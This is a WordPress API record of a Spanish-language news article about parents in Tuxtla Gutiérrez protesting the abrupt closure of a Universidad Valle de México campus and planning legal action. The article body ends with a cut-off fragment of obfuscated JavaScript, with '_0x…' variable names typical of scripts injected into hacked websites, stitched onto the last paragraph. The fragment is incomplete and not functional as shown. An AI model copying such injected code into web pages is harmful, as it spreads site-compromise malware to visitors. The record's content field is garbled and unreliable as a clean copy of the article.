{"id":22162,"date":"2025-05-30T04:10:41","date_gmt":"2025-05-30T04:10:41","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=22162"},"modified":"2025-05-30T04:10:41","modified_gmt":"2025-05-30T04:10:41","slug":"padres-aseguran-que-tomaran-acciones-legales-por-cierre-de-la-uvm","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=22162","title":{"rendered":"Padres aseguran que tomar\u00e1n acciones legales por cierre de la UVM"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"765\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000142935-1024x765.jpg\" alt=\"\" class=\"wp-image-22163\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000142935-1024x765.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000142935-300x224.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000142935-768x574.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000142935-1536x1148.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/05\/1000142935.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Manuel Jim\u00e9nez.<\/p>\n\n\n\n<p>29 de mayo del 2025. Tuxtla Guti\u00e9rrez.- Tal como lo hab\u00edan anunciado, padres de familia de la Universidad Valle de M\u00e9xico campus Tuxtla Guti\u00e9rrez realizaron una protesta en la entrada de la instituci\u00f3n ante su inesperado cierre.<\/p>\n\n\n\n<p>Esta situaci\u00f3n ha dejado en la incertidumbre a la plantilla estudiantil y ha generado gran preocupaci\u00f3n en los tutores ante el paro repentino de los estudios de los j\u00f3venes.<\/p>\n\n\n\n<p>Se\u00f1alaron que, el aviso del cierre fue de manera inesperada, \u00fanicamente mandaron un correo a los tutores y a los alumnos hace aproximadamente una semana.<\/p>\n\n\n\n<p>Despu\u00e9s de esta notificaci\u00f3n, los fueron llamando por carrera para notificarles que era una orden directa que ven\u00eda de la Ciudad de M\u00e9xico, pero no hubo mayor explicaci\u00f3n.<\/p>\n\n\n\n<p>Expresaron que: \u201cEl mayor problema es que, estamos en la incertidumbre, nos han dado opciones para que nuestros hijos sigan sus estudios pero tampoco es viable\u201d<\/p>\n\n\n\n<p>El personal de la instituci\u00f3n plantea la posibilidad de que los alumnos sigan estudiando en otros campus de la UVM de otros estados de la Rep\u00fablica.<\/p>\n\n\n\n<p>Todo ello est\u00e1 causado gran indignaci\u00f3n, incertidumbre y frustraci\u00f3n entre la comunidad estudiantil as\u00ed como el enojo de los tutores que, aseguran, est\u00e1n tomando acciones legales.<\/p>\n\n\n\n<p>Los padres de familia expresaron que: \u201cNos han dicho que los alumnos pueden continuar sus estudios en Puebla o Veracruz, convenios con universidades locales o migraci\u00f3n a clases en l\u00ednea, pero tampoco estamos en posibilidades de cambiar a nuestros hijos a otros estados\u201d.<\/p>\n\n\n\n<p>Al plantearles la posibilidad de retomar los estudios en la Universidad de Ciencias y Artes de Chiapas, consideran que no es viable ya que, el ciclo en esa instituci\u00f3n ya comenz\u00f3 el ciclo y los j\u00f3venes perder\u00e1n un a\u00f1o.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Manuel Jim\u00e9nez. 29 de mayo del 2025. Tuxtla Guti\u00e9rrez.- Tal como lo hab\u00edan anunciado, padres de familia de la Universidad Valle de M\u00e9xico campus Tuxtla Guti\u00e9rrez realizaron una protesta en la entrada de la instituci\u00f3n ante su inesperado cierre. Esta situaci\u00f3n ha dejado en la incertidumbre a la plantilla estudiantil y ha generado gran preocupaci\u00f3n &hellip;<\/p>\n","protected":false},"author":2,"featured_media":22163,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-22162","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22162","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=22162"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22162\/revisions"}],"predecessor-version":[{"id":22164,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/22162\/revisions\/22164"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/22163"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=22162"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=22162"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=22162"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}